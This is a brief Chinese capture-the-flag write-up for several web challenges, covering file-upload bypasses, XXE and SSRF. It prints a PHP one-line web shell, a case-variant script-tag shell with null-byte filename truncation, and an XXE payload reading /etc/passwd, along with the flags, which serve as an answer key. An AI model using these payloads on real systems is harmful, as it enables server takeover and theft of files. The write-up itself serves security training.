文章目录
第七周 | 再见上传
<?php @eval($_POST['g']);?>做一个木马,发现只是上传png格式,但是dir也被post了,可以修改dir来拼接文件名,加上%00阶段(%00需要urldecode)
flag{asdf_hetianlab_com}
第八周 | 随意的上传
<script language="Php">eval($_REQUEST[1])</script>
<?和php都被过滤替换了,php可以大写绕过Php
flag{0123_4567_8901}
第十三周 | simple xxe
可以用file协议读文件
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE note [
<!ENTITY admin SYSTEM "file:///etc/passwd">
]>
<user><username>&admin;</username><password>123456</password></user>
注释里面有提示
flag{hetianlab_ctf}
第十五周 | 回显的SSRF
File协议读文件
flag{enter_your_passwd}